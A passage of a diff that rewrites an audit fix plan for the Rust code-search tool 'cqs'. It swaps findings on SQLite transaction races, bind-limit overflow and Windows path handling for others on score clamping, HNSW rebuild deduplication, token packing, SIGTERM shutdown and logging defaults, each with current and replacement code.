-                // leaf-only `matched()` would miss this case — same logic
-                // as `collect_events` in `cli/watch.rs`.
-                if matcher
-                    .matched_path_or_any_parents(&absolute, false)
-                    .is_ignore()
-                {
-                    ignored.push(origin);
-                }
-            }
-
-            if ignored.is_empty() {
-                return Ok(0);
-            }
-
-            // Phase 2: batched delete in the SAME transaction started above.
-            // Same shape as `prune_missing` so a partial prune on crash
-            // leaves the index consistent with the remaining rows in `chunks`.
-            const BATCH_SIZE: usize = 100;
-            let mut deleted = 0u32;
-```
-
-Remove the second `let (_guard, mut tx) = self.begin_write().await?;` currently on line 374 — the tx is already active.
-
-**Why**: Identical TOCTOU class as DS2-1 — the idle-time GC reads a snapshot of origins via the pool, walks the matcher, then opens a write tx to delete. A concurrent upsert landing during the matcher walk (non-trivial for large corpora) creates chunks for paths the matcher will later flag as ignored; the stale origin list then points the DELETE at a just-inserted row. Serialising the read under the write lock closes it.
-
-**Verify**: `cargo build --features gpu-index` and `cargo test --features gpu-index prune_gitignored` plus `cargo test --features gpu-index store::chunks::staleness::`.
-
----
-
-## P2
-
-### SEC-4: IN-list bind overflow in `build_graph` / `build_hierarchy`
-
-**File**: `/mnt/c/Projects/cqs/src/serve/data.rs`
-
-**Current code** (lines 326-341 — `build_graph` capped-edge branch):
-```rust
-let names: Vec<&str> = name_set.into_iter().collect();
-let placeholders = vec!["?"; names.len()].join(",");
-let edge_sql = format!(
-    "SELECT fc.file, fc.caller_name, fc.callee_name \
-     FROM function_calls fc \
-     WHERE fc.callee_name IN ({placeholders}) \
-        OR fc.caller_name IN ({placeholders})"
-);
-let mut eq = sqlx::query(&edge_sql);
-for n in &names {
-    eq = eq.bind(*n);
-}
-for n in &names {
-    eq = eq.bind(*n);
-}
-eq.fetch_all(&store.pool).await?
-```
-
-Also at lines 670-680, 743-754 in `build_hierarchy`:
-```rust
-let placeholders = vec!["?"; visited_names.len()].join(",");
-let sql = format!(
-    "SELECT id, name, chunk_type, language, origin, line_start, line_end \
-     FROM chunks WHERE name IN ({placeholders}) ORDER BY id"
-);
-let mut q = sqlx::query(&sql);
-for n in &visited_names {
-    q = q.bind(n);
-}
-```
-(and the edge-sql below at :743-754 which binds `visited_names` twice — total 2× bind count).
-
-**Fix**:
-
-Chunk the IN-list into batches of `SQLITE_MAX_IN_LIST` (e.g. 16_000 to stay under SQLite's 32_766 `SQLITE_MAX_VARIABLE_NUMBER` even when the list is bound twice). Extract a helper:
-
-```rust
-/// SQLite default `SQLITE_MAX_VARIABLE_NUMBER` is 32_766 in modern builds.
-/// We chunk at 16k so queries that bind the list twice (e.g. hierarchy edge
-/// SQL binds visited_names × 2) still fit under the cap.
-const SQLITE_MAX_IN_LIST: usize = 16_000;
-
-async fn fetch_edges_chunked<'a>(
-    pool: &sqlx::SqlitePool,
-    names: &[&'a str],
-    bind_twice: bool,
-) -> Result<Vec<sqlx::sqlite::SqliteRow>, sqlx::Error> {
-    let chunk_size = if bind_twice {
-        SQLITE_MAX_IN_LIST / 2
+pub(crate) fn apply_scoring_pipeline(
+    embedding_score: f32,
+    name: Option<&str>,
+    file_part: &str,
+    ctx: &ScoringContext<'_>,
+) -> Option<f32> {
+    let base_score = if let Some(matcher) = ctx.name_matcher {
+        let n = name.unwrap_or("");
+        let name_score = matcher.score(n);
+        (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
     } else {
-        SQLITE_MAX_IN_LIST
+        embedding_score
     };
-    let mut out = Vec::new();
-    for chunk in names.chunks(chunk_size) {
-        let placeholders = vec!["?"; chunk.len()].join(",");
-        let sql = format!(
-            "SELECT fc.file, fc.caller_name, fc.callee_name \
-             FROM function_calls fc \
-             WHERE fc.callee_name IN ({placeholders}) \
-                OR fc.caller_name IN ({placeholders})"
-        );
-        let mut q = sqlx::query(&sql);
-        for n in chunk {
-            q = q.bind(*n);
-        }
-        for n in chunk {
-            q = q.bind(*n);
-        }
-        out.extend(q.fetch_all(pool).await?);
-    }
-    Ok(out)
-}
 ```
 
-Apply to `build_graph` capped branch (lines 326-341), `build_hierarchy` chunk-fetch (lines 670-680, binds once), and `build_hierarchy` edge-fetch (lines 743-754, binds twice). Deduplicate returned rows with a `HashSet<(caller, callee, file)>` after collection — the chunked split can produce duplicate edges when an edge's caller and callee fall in different chunks.
-
-**Why**: Large corpora (>16k visible chunks under capped-graph path or >32k visited names in deep hierarchy) overflow SQLite's bind limit and return HTTP 500 — trivial DoS without a malformed query.
-
-**Verify**: `cargo build --features gpu-index` + add a unit test (`tests/serve_data_test.rs::build_hierarchy_over_bind_limit`) that seeds >32k chunks and asserts `build_hierarchy(...)` returns `Ok(_)`. `cargo test --features gpu-index --test serve_data_test`.
-
----
-
-### PB-V1.29-1: `cqs context` / `cqs brief` don't normalize backslash paths
-
-**File**: `/mnt/c/Projects/cqs/src/cli/commands/io/context.rs` + `src/cli/commands/io/brief.rs`
-
-**Current code** (context.rs:25-29):
-```rust
-pub(crate) fn build_compact_data<Mode>(store: &Store<Mode>, path: &str) -> Result<CompactData> {
-    let _span = tracing::info_span!("build_compact_data", path).entered();
-    let chunks = store
-        .get_chunks_by_origin(path)
-        .context("Failed to load chunks for file")?;
-```
-
-Same shape at context.rs:108-116 (`build_full_data`) and brief.rs:37-42 (`build_brief_data`).
-
-**Fix**:
-
-At the top of each function, normalize the path so backslash-delimited Windows input matches forward-slash-delimited storage. Use the existing `cqs::normalize_path` helper. It takes `&Path`:
+### Replacement
 
 ```rust
-pub(crate) fn build_compact_data<Mode>(store: &Store<Mode>, path: &str) -> Result<CompactData> {
-    let _span = tracing::info_span!("build_compact_data", path).entered();
-    // PB-V1.29-1: normalize backslash input from Windows / agent pipelines.
-    // `get_chunks_by_origin` matches on the stored `origin` column which is
-    // stored forward-slash; unnormalized `src\foo.rs` silently returns empty.
-    let normalized = cqs::normalize_path(std::path::Path::new(path));
-    let chunks = store
-        .get_chunks_by_origin(&normalized)
-        .context("Failed to load chunks for file")?;
-    if chunks.is_empty() {
-        bail!(
-            "No indexed chunks found for '{}'. Is the file indexed?",
-            path
-        );
-    }
-    // ... rest uses `normalized` downstream where a `&str` path is expected
-```
-
-Apply the same transform at `build_full_data` (context.rs:108+) and `build_brief_data` (brief.rs:37+). Update the downstream calls that use `path` as a key (e.g. the `file:` field in output structs) to use `normalized` so cross-platform JSON consumers see the canonical slash form.
-
-**Why**: On Windows, `cqs context src\foo.rs` returns "No indexed chunks found" even when `src/foo.rs` is indexed. Same class as PR #1044 which fixed `cqs impact`.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_brief_test -- backslash`.
-
----
-
-### PB-V1.29-3: `chunk.id` prefix-strip uses `abs_path.display()`
-
-**File**: `/mnt/c/Projects/cqs/src/cli/watch.rs`
-
-**Current code** (lines 2432-2434):
-```rust
-if let Some(rest) = chunk.id.strip_prefix(&abs_path.display().to_string()) {
-    chunk.id = format!("{}{}", rel_path.display(), rest);
-}
-```
-
-**Fix**:
-
-Use `cqs::normalize_path` on both sides so the prefix-strip is slash-normalized:
-
-```rust
-// PB-V1.29-3: On Windows verbatim paths (`\\?\C:\...`) `abs_path.display()`
-// keeps backslashes while chunk.id was built forward-slash by the parser.
-// Normalize both sides so the strip actually matches.
-let abs_norm = cqs::normalize_path(&abs_path);
-let rel_norm = cqs::normalize_path(&rel_path);
-if let Some(rest) = chunk.id.strip_prefix(abs_norm.as_str()) {
-    chunk.id = format!("{}{}", rel_norm, rest);
-}
-```
-
-**Why**: `abs_path.display()` returns platform-native separator. On Windows verbatim paths the prefix never matches and `chunk.id` keeps the absolute prefix — breaks cross-index equality, call-graph resolution, and HNSW id_map.
-
-**Verify**: `cargo build --features gpu-index`. Add a unit test in `watch.rs::tests` that calls the prefix-strip with a `\\?\C:\Projects\cqs` style path and asserts the result starts with the rel path.
-
----
-
-### PB-V1.29-5: `dispatch_drift` / `dispatch_diff` emit backslashes in JSON
-
-**File**: `/mnt/c/Projects/cqs/src/cli/batch/handlers/misc.rs`
-
-**Current code** (lines 274-281, 350-357, 362-369, 373-383):
-```rust
-.map(|e| {
-    serde_json::json!({
-        "name": e.name,
-        "file": e.file.display().to_string(),
-        "chunk_type": e.chunk_type,
-        "similarity": e.similarity,
-        "drift": e.drift,
-    })
-})
-```
-
-(Same `e.file.display().to_string()` at :353, :365, :377.)
-
-**Fix**:
-
-Replace `e.file.display().to_string()` with `cqs::normalize_path(&e.file)` in all four sites:
-
-```rust
-.map(|e| {
-    serde_json::json!({
-        "name": e.name,
-        "file": cqs::normalize_path(&e.file),
-        "chunk_type": e.chunk_type,
-        "similarity": e.similarity,
-        "drift": e.drift,
-    })
-})
-```
-
-Apply at lines 277, 353, 365, 377. Sister handlers already use `normalize_path`; these four are the drift.
-
-**Why**: `cqs --json diff` / `drift` on Windows emit `"file": "src\\foo.rs"` — breaks agent chaining that passes the field to downstream `cqs context --json`.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_drift_diff_test`.
-
----
-
-### DS2-3: `set_metadata_opt` / `touch_updated_at` bypass WRITE_LOCK
-
-**File**: `/mnt/c/Projects/cqs/src/store/metadata.rs`
-
-**Current code** (lines 409-418, `touch_updated_at`):
-```rust
-pub fn touch_updated_at(&self) -> Result<(), StoreError> {
-    let now = chrono::Utc::now().to_rfc3339();
-    self.rt.block_on(async {
-        sqlx::query("INSERT OR REPLACE INTO metadata (key, value) VALUES ('updated_at', ?1)")
-            .bind(&now)
-            .execute(&self.pool)
-            .await?;
-        Ok(())
-    })
-}
-```
-
-(Same bare `.execute(&self.pool)` pattern at `set_metadata_opt` lines 457-474.)
-
-**Fix**:
-
-Route through `self.begin_write()` so both paths acquire `WRITE_LOCK` before opening the transaction (mirrors `set_hnsw_dirty` at :436-449):
-
-```rust
-pub fn touch_updated_at(&self) -> Result<(), StoreError> {
-    let now = chrono::Utc::now().to_rfc3339();
-    self.rt.block_on(async {
-        let (_guard, mut tx) = self.begin_write().await?;
-        sqlx::query("INSERT OR REPLACE INTO metadata (key, value) VALUES ('updated_at', ?1)")
-            .bind(&now)
-            .execute(&mut *tx)
-            .await?;
-        tx.commit().await?;
-        Ok(())
-    })
-}
-
-pub(crate) fn set_metadata_opt(&self, key: &str, value: Option<&str>) -> Result<(), StoreError> {
-    self.rt.block_on(async {
-        let (_guard, mut tx) = self.begin_write().await?;
-        match value {
-            Some(v) => {
-                sqlx::query("INSERT OR REPLACE INTO metadata (key, value) VALUES (?1, ?2)")
-                    .bind(key)
-                    .bind(v)
-                    .execute(&mut *tx)
-                    .await?;
-            }
-            None => {
-                sqlx::query("DELETE FROM metadata WHERE key = ?1")
-                    .bind(key)
-                    .execute(&mut *tx)
-                    .await?;
-            }
-        }
-        tx.commit().await?;
-        Ok(())
-    })
-}
-```
-
-**Why**: Concurrent reindex + batch-id setter can race → `SQLITE_BUSY` / observable inconsistency. DS-V1.25-3 closed the class for `set_hnsw_dirty`; these two setters missed the wave.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib store::metadata`.
-
----
-
-### DS2-4: Phantom-chunks DELETE separate tx from upsert
-
-**File**: `/mnt/c/Projects/cqs/src/cli/watch.rs`
-
-**Current code** (lines 2568-2579):
-```rust
-store.upsert_chunks_and_calls(pairs, mtime, &file_calls)?;
-
-// DS-37 / RT-DATA-10: Delete phantom chunks — functions removed from the
-// file but still lingering in the index. The upsert above handles updates
-// and inserts; this cleans up deletions.
-//
-// Ideally this would share a transaction with upsert_chunks_and_calls, but
-// both methods manage their own internal transactions. A crash between the
-// two leaves phantoms that get cleaned on the next reindex. Propagate the
-// error rather than silently swallowing it.
-let live_ids: Vec<&str> = pairs.iter().map(|(c, _)| c.id.as_str()).collect();
-store.delete_phantom_chunks(file, &live_ids)?;
-```
-
-**Fix**:
-
-Add a combined API on `Store<ReadWrite>` that does both the upsert and the phantom delete inside a single `begin_write` transaction. Shape:
-
-```rust
-// In src/store/chunks/crud.rs (or a new file-level mod):
-pub fn upsert_chunks_calls_and_prune<P: AsRef<Path>>(
-    &self,
-    pairs: Vec<(Chunk, Embedding)>,
-    mtime: Option<i64>,
-    calls: &[(String, CallSite)],
-    file: P,
-    live_ids: &[&str],
-) -> Result<(), StoreError> {
-    let _span = tracing::info_span!("upsert_chunks_calls_and_prune").entered();
-    self.rt.block_on(async {
-        let (_guard, mut tx) = self.begin_write().await?;
-        // Existing upsert_chunks_and_calls inner logic, adapted to run on `&mut tx`
-        self.upsert_chunks_and_calls_tx(&mut tx, &pairs, mtime, calls).await?;
-        self.delete_phantom_chunks_tx(&mut tx, file.as_ref(), live_ids).await?;
-        tx.commit().await?;
-        Ok(())
-    })
-}
-```
-
-Watch call site becomes:
-```rust
-let live_ids: Vec<&str> = pairs.iter().map(|(c, _)| c.id.as_str()).collect();
-store.upsert_chunks_calls_and_prune(pairs, mtime, &file_calls, file, &live_ids)?;
-```
-
-Refactor the existing `upsert_chunks_and_calls` and `delete_phantom_chunks` to take an optional `&mut tx` (`_tx` inner variant) so the combined function can share the transaction; the pub methods keep their own `begin_write` for other call sites.
-
-**Why**: Mid-batch crash between `upsert_chunks_and_calls` commit and `delete_phantom_chunks` commit serves queries against a half-pruned index (new chunks visible but deleted ones still present). The comment already acknowledges the gap as tech debt.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib store::chunks::crud`. Add a crash-simulation test that injects a failure between the two operations and asserts the pre-batch state is visible.
-
----
-
-### DS2-8: `CQS_MIGRATE_REQUIRE_BACKUP` defaults to off
-
-**File**: `/mnt/c/Projects/cqs/src/store/backup.rs`
-
-**Current code** (lines 117-141):
-```rust
-Err(e) => {
-    let require = std::env::var(REQUIRE_BACKUP_ENV)
-        .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
-        .unwrap_or(false);
-    if require {
-        tracing::error!(
-            error = %e,
-            db = %db_path.display(),
-            "Migration backup failed and CQS_MIGRATE_REQUIRE_BACKUP=1 is set; aborting"
-        );
-        remove_triplet(&backup_db);
-        Err(e)
+pub(crate) fn apply_scoring_pipeline(
+    embedding_score: f32,
+    name: Option<&str>,
+    file_part: &str,
+    ctx: &ScoringContext<'_>,
+) -> Option<f32> {
+    // Defense-in-depth: clamp name_boost into [0.0, 1.0] regardless of where
+    // it originated. CLI uses parse_unit_f32 (clap-bounded) and config uses
+    // clamp_config_f32, but a future programmatic / deserialised path could
+    // bypass both, in which case `(1.0 - 5.0) * embedding` would sign-flip
+    // search results silently. Cheap insurance.
+    let name_boost = ctx.filter.name_boost.clamp(0.0, 1.0);
+    let base_score = if let Some(matcher) = ctx.name_matcher {
+        let n = name.unwrap_or("");
+        let name_score = matcher.score(n);
+        (1.0 - name_boost) * embedding_score + name_boost * name_score
     } else {
-        tracing::warn!(
-            error = %e,
-            db = %db_path.display(),
-            "Migration backup failed; proceeding without snapshot \
-             (set CQS_MIGRATE_REQUIRE_BACKUP=1 to fail instead)"
-        );
-        remove_triplet(&backup_db);
-        Ok(None)
+        embedding_score
+    };
+```
+
+### Notes
+
+- LINE DRIFT noted: searched for `parse_finite_f32` on `name_boost`, found `parse_unit_f32` at `src/cli/args.rs:62`. Audit text was stale; CLI parser fix already shipped (per audit `AC-V1.29-5`). Only the consumer-side defensive clamp remains.
+- Add a test `test_apply_scoring_pipeline_clamps_out_of_range_name_boost` in `src/search/scoring/candidate.rs::tests` that constructs a `ScoringContext` with `name_boost = 5.0` and asserts the embedding signal is not negated.
+
+---
+
+## P1.17 — drain_pending_rebuild dedup drops fresh embeddings during rebuild window
+
+**Finding:** P1.17 in audit-triage.md / Algorithm
+**Files:** `src/cli/watch.rs:1077-1105`
+**Why:** Non-blocking HNSW rebuild (#1113) snapshots `(id, embedding)` from a read-only Store, while the watch loop captures fresh `(id, embedding)` pairs into `pending.delta`. On swap, dedup is by id — if a chunk was re-embedded mid-rebuild (file edit), its fresh embedding lands in delta but `known` already contains the id with the OLD embedding from the snapshot. The filter drops the fresh embedding; HNSW carries stale vector until next threshold rebuild.
+
+### Current code (src/cli/watch.rs:1077-1105)
+
+```rust
+    match outcome {
+        Ok(Some(mut new_index)) => {
+            // Replay captured delta — but skip ids the rebuild thread already
+            // saw via its store snapshot, so we don't double-insert. (hnsw_rs
+            // has no dedup; duplicate ids would create twin vectors that bloat
+            // the graph until the next threshold cleans them up.)
+            let known: std::collections::HashSet<&str> =
+                new_index.ids().iter().map(String::as_str).collect();
+            let to_replay: Vec<(String, Embedding)> = pending
+                .delta
+                .into_iter()
+                .filter(|(id, _)| !known.contains(id.as_str()))
+                .collect();
+            drop(known);
+            if !to_replay.is_empty() {
+                let items: Vec<(String, &[f32])> = to_replay
+                    .iter()
+                    .map(|(id, emb)| (id.clone(), emb.as_slice()))
+                    .collect();
+                match new_index.insert_batch(&items) {
+                    Ok(n) => {
+                        tracing::info!(replayed = n, "Replayed delta into rebuilt HNSW before swap")
+                    }
+                    Err(e) => tracing::warn!(
+                        error = %e,
+                        replayed_attempt = items.len(),
+                        "Failed to replay delta into rebuilt HNSW; new chunks will surface on next rebuild"
+                    ),
+                }
+            }
+```
+
+### Replacement
+
+The dedup must compare by content fidelity, not just by id. Options:
+1. **Cheapest, correct:** Replay every delta entry unconditionally; on duplicate id, *replace* the snapshot vector. `hnsw_rs` has no replace, so use a "remove then insert" path.
+2. **Cheapest, accept stale:** Always insert delta; tolerate duplicate twin vectors until next rebuild (the audit explicitly flags this as a graph-size regression).
+3. **Correct, more invasive:** Capture `content_hash` alongside the snapshot, replay only when the delta entry's hash differs.
+
+Pick option 3 for correctness. `pending.delta` becomes `Vec<(String, Embedding, ContentHash)>`, the rebuild thread returns `Vec<(String, ContentHash)>` alongside the index, and the dedup filter checks the hash.
+
+This is **>30 lines of change** spanning `pending` struct definition, the rebuild thread, and the drain — see Notes for the full API change.
+
+### Notes
+
+- **STRUCTURAL CHANGE — exceeds 30-line replacement budget.** API change required:
+  - `PendingRebuild::delta: Vec<(String, Embedding)>` → `Vec<(String, Embedding, [u8; 32])>` (or `Vec<(String, Embedding, blake3::Hash)>`).
+  - `spawn_hnsw_rebuild` closure (`src/cli/watch.rs:980-1030`) returns `RebuildOutcome` — extend with `snapshot_hashes: Vec<(String, [u8; 32])>` so the drain can dedup by `(id, hash)`.
+  - Capture-site: wherever `pending.delta.push(...)` is called (search `pending.delta.push` and the watch reindex path). Each push must include the chunk's `content_hash`.
+  - Drain-site replacement (lines 1077-1105):
+    ```rust
+    let known: std::collections::HashMap<&str, &[u8; 32]> =
+        snapshot_hashes.iter().map(|(id, h)| (id.as_str(), h)).collect();
+    let to_replay: Vec<(String, Embedding)> = pending
+        .delta
+        .into_iter()
+        .filter(|(id, _, hash)| {
+            // Replay if id is unknown OR if the snapshot's vector was built
+            // from an older content_hash — fresh embedding wins.
+            known.get(id.as_str()).is_none_or(|sh| sh != &hash)
+        })
+        .map(|(id, emb, _hash)| (id, emb))
+        .collect();
+    ```
+- Add a regression test `test_rebuild_window_re_embedding_replays_fresh_vector` in `src/cli/watch.rs::tests` that:
+  1. Spawns a rebuild with snapshot `[("a", emb_v1, hash_v1)]`.
+  2. Mid-rebuild, pushes `("a", emb_v2, hash_v2)` to `pending.delta`.
+  3. After drain, asserts the swapped HNSW contains `emb_v2`, not `emb_v1`.
+- This finding overlaps with P2.29 (TC-ADV: Non-blocking HNSW rebuild — no panic/dim-drift/store-fail tests). Coordinate the fix with the rebuild test suite.
+
+---
+
+## P1.18 — token_pack break-on-first-oversized — drops smaller items that would fit
+
+**Finding:** P1.18 in audit-triage.md / Algorithm
+**Files:** `src/cli/commands/mod.rs:398-417`
+**Why:** Greedy knapsack: `if used + tokens > budget && kept_any { break; }`. Once one item fails to fit, every lower-scored item is dropped — even items that fit comfortably. Repro: budget=300, items `[A=250, B=100, C=40]`. After A packs (used=250), B fails (350>300) → break → C silently dropped though `used+40=290 ≤ 300`.
+
+### Current code (src/cli/commands/mod.rs:394-422)
+
+```rust
+    // Greedy pack in score order, tracking which indices to keep
+    let mut used: usize = 0;
+    let mut kept_any = false;
+    let mut keep: Vec<bool> = vec![false; items.len()];
+    for idx in order {
+        let tokens = token_counts[idx] + json_overhead_per_item;
+        if used + tokens > budget && kept_any {
+            break;
+        }
+        if !kept_any && tokens > budget {
+            // Always include at least one result, but cap at 10x budget to avoid
+            // pathological cases (e.g., 50K-token item with 300-token budget).
+            // When budget == 0, skip the 10x guard (0 * 10 == 0, which would reject
+            // every item) and include the first item unconditionally.
+            if budget > 0 && tokens > budget * 10 {
+                tracing::debug!(tokens, budget, "First item exceeds 10x budget, skipping");
+                continue;
+            }
+            tracing::debug!(
+                tokens,
+                budget,
+                "First item exceeds token budget, including anyway"
+            );
+        }
+        used += tokens;
+        keep[idx] = true;
+        kept_any = true;
+    }
+```
+
+### Replacement
+
+```rust
+    // Greedy pack in score order, tracking which indices to keep.
+    //
+    // Note: when an oversized item appears mid-stream we `continue` rather
+    // than `break` so subsequent (smaller, lower-scored) items can still
+    // fit into the remaining budget. Score-ordered packing already prefers
+    // higher-relevance items; the greedy fall-through is the right rounding
+    // when one mid-list item won't fit.
+    let mut used: usize = 0;
+    let mut kept_any = false;
+    let mut keep: Vec<bool> = vec![false; items.len()];
+    for idx in order {
+        let tokens = token_counts[idx] + json_overhead_per_item;
+        if used + tokens > budget && kept_any {
+            // Skip this oversized item but keep probing — smaller items
+            // later in score order may still fit.
+            continue;
+        }
+        if !kept_any && tokens > budget {
+            // Always include at least one result, but cap at 10x budget to avoid
+            // pathological cases (e.g., 50K-token item with 300-token budget).
+            // When budget == 0, skip the 10x guard (0 * 10 == 0, which would reject
+            // every item) and include the first item unconditionally.
+            if budget > 0 && tokens > budget * 10 {
+                tracing::debug!(tokens, budget, "First item exceeds 10x budget, skipping");
+                continue;
+            }
+            tracing::debug!(
+                tokens,
+                budget,
+                "First item exceeds token budget, including anyway"
+            );
+        }
+        used += tokens;
+        keep[idx] = true;
+        kept_any = true;
+    }
+```
+
+### Notes
+
+- Single-token change: `break` → `continue`.
+- Add a regression test in `src/cli/commands/mod.rs::tests`:
+  ```rust
+  #[test]
+  fn token_pack_continues_past_oversized_midstream_item() {
+      // items in score order: oversized, fits, fits
+      let items = vec![/* score=1.0 250-token, score=0.9 100-token, score=0.8 40-token */];
+      let token_counts = vec![250, 100, 40];
+      let (kept, used) = token_pack(&items, &token_counts, /* budget */ 300, /* json_overhead */ 0, /* score_fn */ ...);
+      assert_eq!(kept.len(), 2);  // A + C, B skipped
+      assert_eq!(used, 290);
+  }
+  ```
+
+---
+
+## P1.19 — cqs serve shutdown handles only Ctrl-C — SIGTERM (systemctl) skips graceful drain
+
+**Finding:** P1.19 in audit-triage.md / Platform Behavior
+**Files:** `src/serve/mod.rs:253-260`
+**Why:** `shutdown_signal()` awaits only `tokio::signal::ctrl_c()`. Under systemd or any supervisor that issues `SIGTERM` (default for `systemctl stop`), axum never sees the signal and gets `SIGKILL`'d. macOS `launchd` also sends SIGTERM by default.
+
+### Current code (src/serve/mod.rs:253-260)
+
+```rust
+/// Listen for Ctrl-C to trigger axum's graceful shutdown.
+async fn shutdown_signal() {
+    if let Err(e) = tokio::signal::ctrl_c().await {
+        tracing::warn!(error = %e, "failed to install ctrl-c handler; server will only stop on listener failure");
+        std::future::pending::<()>().await;
+    }
+    tracing::info!("ctrl-c received, beginning graceful shutdown");
+}
+```
+
+### Replacement
+
+```rust
+/// Listen for Ctrl-C, SIGTERM (Unix), or Ctrl-Break/Ctrl-Close (Windows) to
+/// trigger axum's graceful shutdown. Without SIGTERM handling, `systemctl stop`
+/// and `launchd` shutdowns escalate to SIGKILL with no graceful drain.
+async fn shutdown_signal() {
+    let ctrl_c = async {
+        if let Err(e) = tokio::signal::ctrl_c().await {
+            tracing::warn!(error = %e, "failed to install ctrl-c handler");
+            std::future::pending::<()>().await;
+        }
+    };
+
+    #[cfg(unix)]
+    let terminate = async {
+        match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
+            Ok(mut s) => {
+                s.recv().await;
+            }
+            Err(e) => {
+                tracing::warn!(error = %e, "failed to install SIGTERM handler");
+                std::future::pending::<()>().await;
+            }
+        }
+    };
+
+    #[cfg(not(unix))]
+    let terminate = std::future::pending::<()>();
+
+    tokio::select! {
+        _ = ctrl_c => tracing::info!("ctrl-c received, beginning graceful shutdown"),
+        _ = terminate => tracing::info!("SIGTERM received, beginning graceful shutdown"),
     }
 }
 ```
 
-**Fix**:
+### Notes
 
-Flip the default: require backup by default, allow opt-out via `CQS_MIGRATE_REQUIRE_BACKUP=0`. Destructive migrations (v18→v19 drops the old sparse_vectors table) without a backup are a data-loss hazard on first failure.
+- `tokio::signal::unix::signal` is available with the `signal` feature on tokio. Verify Cargo.toml has `tokio = { ..., features = [..., "signal"] }` — likely already enabled for ctrl_c.
+- Stretch: also handle `SignalKind::interrupt()` and Windows `ctrl_break()`/`ctrl_close()`. Skipping for the easy P1 fix; SIGTERM is the high-impact case.
+- Companion finding in `src/cli/watch.rs:132-148` already installs a SIGTERM handler via `libc::signal` for the daemon — this fix brings serve to parity.
+
+---
+
+## P1.20 — Default subscriber drops every info_span — 150 spans invisible at default level
+
+**Finding:** P1.20 in audit-triage.md / Observability OB-V1.30-1
+**Files:** `src/main.rs:14-32`
+**Why:** Default `EnvFilter` is `"warn,ort=error"`, but every span across `scout`, `gather`, `serve`, `cache`, `slot`, parser, store, embedder is `info_span!` or `debug_span!`. Subscriber drops them all. The heavy investment in span instrumentation is invisible until the user discovers `--verbose`/`RUST_LOG=info`. Daemon under `cqs watch --serve` inherits empty `RUST_LOG` and is doubly hit.
+
+### Current code (src/main.rs:14-32)
 
 ```rust
-Err(e) => {
-    // DS2-8: Require-backup is now the default. Opt-out via
-    // CQS_MIGRATE_REQUIRE_BACKUP=0 for environments where the user
-    // accepts the data-loss risk (e.g. CI rebuilding from source).
-    let allow_no_backup = std::env::var(REQUIRE_BACKUP_ENV)
-        .map(|v| v == "0" || v.eq_ignore_ascii_case("false"))
-        .unwrap_or(false);
-    if allow_no_backup {
-        tracing::warn!(
-            error = %e,
-            db = %db_path.display(),
-            "Migration backup failed; proceeding without snapshot \
-             (CQS_MIGRATE_REQUIRE_BACKUP=0 is set)"
-        );
-        remove_triplet(&backup_db);
-        Ok(None)
+fn main() -> Result<()> {
+    // Parse CLI first to check verbose flag
+    let cli = cli::Cli::parse();
+
+    // Log to stderr to keep stdout clean for structured output
+    // --verbose flag sets debug level, otherwise use RUST_LOG or default to warn
+    let filter = if cli.verbose {
+        EnvFilter::new("debug")
     } else {
-        tracing::error!(
-            error = %e,
-            db = %db_path.display(),
-            "Migration backup failed; aborting to protect DB. \
-             Set CQS_MIGRATE_REQUIRE_BACKUP=0 to proceed without a snapshot \
-             (data loss risk on migration failure)."
-        );
-        remove_triplet(&backup_db);
-        Err(e)
-    }
+        EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new("warn,ort=error"))
+    };
+
+    tracing_subscriber::fmt()
+        .with_env_filter(filter)
+        .with_writer(std::io::stderr)
+        .init();
+
+    cli::run_with(cli)
 }
 ```
 
-Update `SECURITY.md` and `CONTRIBUTING.md` threat-model sections to document the new default. Update the docstring at migrations.rs:51-54.
-
-**Why**: v18→v19 drops the `sparse_vectors` table after a rebuild. If the rebuild commits but the post-rebuild `UPDATE metadata` fails mid-flight without a backup, the user has lost their SPLADE data with no recovery path short of `cqs index --force`. Opt-in to destructive behavior is the standard stance; opt-out is inverted for data-safety.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib store::backup`. Add a test that confirms backup-failure + missing env var returns `Err`.
-
----
-
-### AC-V1.29-1: `semantic_diff` sort no tie-break
-
-**File**: `/mnt/c/Projects/cqs/src/diff.rs`
-
-**Current code** (lines 202-207):
-```rust
-modified.sort_by(|a, b| match (a.similarity, b.similarity) {
-    (Some(sa), Some(sb)) => sa.total_cmp(&sb),
-    (Some(_), None) => std::cmp::Ordering::Less,
-    (None, Some(_)) => std::cmp::Ordering::Greater,
-    (None, None) => std::cmp::Ordering::Equal,
-});
-```
-
-(Same shape in the test at lines 298-303.)
-
-**Fix**:
-
-Add secondary tie-breaks on `(file, name, chunk_type)` so identical similarities produce deterministic output:
+### Replacement
 
 ```rust
-modified.sort_by(|a, b| {
-    match (a.similarity, b.similarity) {
-        (Some(sa), Some(sb)) => sa.total_cmp(&sb),
-        (Some(_), None) => std::cmp::Ordering::Less,
-        (None, Some(_)) => std::cmp::Ordering::Greater,
-        (None, None) => std::cmp::Ordering::Equal,
-    }
-    .then_with(|| a.file.cmp(&b.file))
-    .then_with(|| a.name.cmp(&b.name))
-    .then_with(|| format!("{:?}", a.chunk_type).cmp(&format!("{:?}", b.chunk_type)))
-});
-```
+fn main() -> Result<()> {
+    // Parse CLI first to check verbose flag
+    let cli = cli::Cli::parse();
 
-Also update the `test_diff_sort_none_similarity_at_end` test to assert tie-broken order, and add a new test that constructs two entries with identical similarity + asserts lexicographic file order.
+    // Log to stderr to keep stdout clean for structured output.
+    // --verbose flag sets debug level for cqs (everything else stays at info),
+    // otherwise honour RUST_LOG, defaulting to "cqs=info,warn" so the
+    // ~150 span instrumentation sites in the codebase actually render
+    // without third-party noise. (OB-V1.30-1.)
+    let filter = if cli.verbose {
+        EnvFilter::new("cqs=debug,info")
+    } else {
+        EnvFilter::try_from_default_env()
+            .unwrap_or_else(|_| EnvFilter::new("cqs=info,warn,ort=error"))
+    };
 
-**Why**: `cqs diff` / `cqs drift` output is non-deterministic when scores tie — CI pipelines diffing output hit spurious failures.
+    // FmtSpan::CLOSE emits a synthetic event on span close with elapsed time —
+    // turns every `info_span!("foo", ...).entered()` into a "foo" + latency
